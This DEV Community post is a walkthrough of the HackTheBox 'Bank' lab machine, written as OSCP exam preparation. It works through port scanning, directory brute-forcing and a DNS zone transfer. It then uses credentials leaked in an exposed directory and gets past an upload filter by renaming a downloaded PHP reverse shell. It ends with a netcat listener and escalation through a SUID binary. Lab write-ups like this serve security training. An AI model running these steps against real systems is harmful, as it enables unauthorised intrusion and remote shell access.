DEV Community

Cover image for Writeup: HackTheBox Bank- Without Metasploit (OSCP Prep)
Chris 'Huey' S
Chris 'Huey' S

Posted on

Writeup: HackTheBox Bank- Without Metasploit (OSCP Prep)

Hello all,

Some quick updates, I decided to schedule my OSCP for early October to give me enough time to run through some more box's then move over to Proving Ground on OffSec's platform.

Now let's jump right in!!

Command:

nmap -sC -sV -T4 -oN nmap.txt 10.10.10.29

  1. -sC = Default Scripts
  2. -sV = Probe open ports to determine service/Versions info
  3. -T4 = Set timing for faster output (0-5)
  4. -oN = Output to save it to a file

Alt Text

Ports Open:

  1. 22 SSH OpenSSH 6.6.1p1
  2. 53 ISC Bind 9.0.5-3ubuntu0
  3. 80 HTTP Apache HTTPD 2.4.7

Let's run a quick Vulnerability Scan to see what we can find.

Command:

nmap --script vuln -T4 -oN vuln.txt 10.10.10.29

Alt Text

So I see a DoS here but that doesn't really help us because we want to get an RCE on the box :-).

I am going to head over to the site to see what I find there...

Alt Text

Some thing I did while on the site was to check out the source and some of the directories listed but nothing too special stuck out for me.

I am going to run a Dirb to see if there are any hidden directories here.

Alt Text
Alt Text

So both of these sites bring up a Forbidden screen.

Let's now try using Gobuster.

Command:

gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Alt Text

Being that port 53 is open I am going to checkout the DNS record.

Command:

nslookup
127.0.0.1
10.10.10.29
bank.htb

If you noticed when doing a look at the IP it can't locate but when looking at bank.htb it comes up with the addresses.

Command:

dig axfr @10.10.10.29
As we can see not too many hits...

dig axfr bank.htb @10.10.10.29

Alt Text

I am going to edit the /etc/hosts/ and the /etc/resolv.conf

Alt Text

Command:

10.10.10.29 bank.htb

Alt Text

Command:

nano /etc/resolv.conf
nameserver 10.10.10.29

Alt Text

Let's try and re-run GoBuster!

Command:

gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Alt Text

After making those quick addition's we get a lot more hits. So let's go check them out.

Alt Text

Clicking on the Parent Directory brings up a login screen for an Email and Password. I tried some dummy emails and common enumeration but it didn't work.

Alt Text

Now I am going to checkout the Balance-Transfer directory, to see if there is anything interesting there.

Alt Text

Each of these look like specific accounts for users with their hashed Email/Passwords with their account balances. If you go down the line, each of the links provides a different account.

One thing we will do is sort by size to see if there is any differences.

Alt Text

After doing so we see there is a 257 size .acc file here. Open it and let's take a look.

Alt Text

Here we can see there is un-hashed account information such as:

  1. Email = chris@bank.htb
  2. Password = !##HTBB4nkP4ssw0rd!##

Now head back over to the login screen again and put in the creds we just found.

Alt Text

Alt Text

Click the Support link and it will bring up a way for the current user to submit Files.

Alt Text

On my Kali machine I create a test file to see if I can upload a file.

Command:

touch test.php

Now on your console try and upload it.

Alt Text

Alt Text

Change it from a php file to a jpg file.

Alt Text

Alt Text

So I did some quick GoogleFu and I didn't see any JPG reverse-shells. But when I inspected the page I came across this line of text.

Alt Text

So lets grab a php-reverse-shell then we can update the code to hopefully get a shell.

Command:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

nano php-reverse-shell.php
Change the IP to your tun0 and the Port IP
chmod +x php-reverse-shell.php

Alt Text

Alt Text

Now we are going to change the php file to a htb file.

Command:

mv php-reverse-shell.php shell.htb

Alt Text

Now let's re-upload this back to the site.

Alt Text

Command:

nc -nvlp 1234

Give it a few seconds then you should get access!

Alt Text

Now let's upgrade the shell using the following scripts Link.

Command:

python -c 'import pty; pty.spawn("/bin/bash")'

Alt Text

Command:

whoami

Alt Text

Priv Esc

Command:

Find / -perm -4000 2>/dev/null

Alt Text

It appears that the Emergency file should be able to run with the appropriate permissions.

Command:

cd /var/htb/bin
ls
./emergency
whoami

Alt Text

Now locate the Root/User .txt files.

Alt Text

Alt Text

Discussion (1)

Collapse
wireless90 profile image
wireless90

Can explain more on find perm command. What we tryna do.